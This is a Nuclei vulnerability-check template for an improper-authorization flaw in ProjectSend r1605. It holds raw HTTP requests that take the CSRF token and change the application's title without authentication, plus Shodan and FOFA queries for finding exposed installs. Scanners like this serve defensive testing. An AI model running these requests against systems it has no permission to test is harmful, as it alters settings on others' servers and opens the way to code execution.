2024-09-03 11:57:21 +00:00
id : projectsend-auth-bypass
info :
name : ProjectSend <= r1605 - Improper Authorization
author : DhiyaneshDK
severity : high
description : |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
reference :
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
metadata :
verified : true
max-request : 1
2024-09-05 04:24:19 +00:00
fofa-query : body="ProjectSend"
2024-09-03 11:57:21 +00:00
shodan-query : html:"ProjectSend"
tags : misconfig,projectsend,auth-bypass
variables :
string : "{{randstr}}"
flow : http(1) && http(2)
http :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition : and
internal : true
extractors :
- type : regex
name : csrf
group : 1
regex :
- 'name="csrf_token" value="([0-9a-z]+)"'
internal : true
- raw :
- |
POST /options.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{string}}
- |
GET / HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2024-09-05 04:24:19 +00:00
- 'status_code_2 == 200'
- 'contains(body_2, "{{string}}")'
2024-09-03 11:57:21 +00:00
condition : and
2024-09-05 04:46:54 +00:00
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950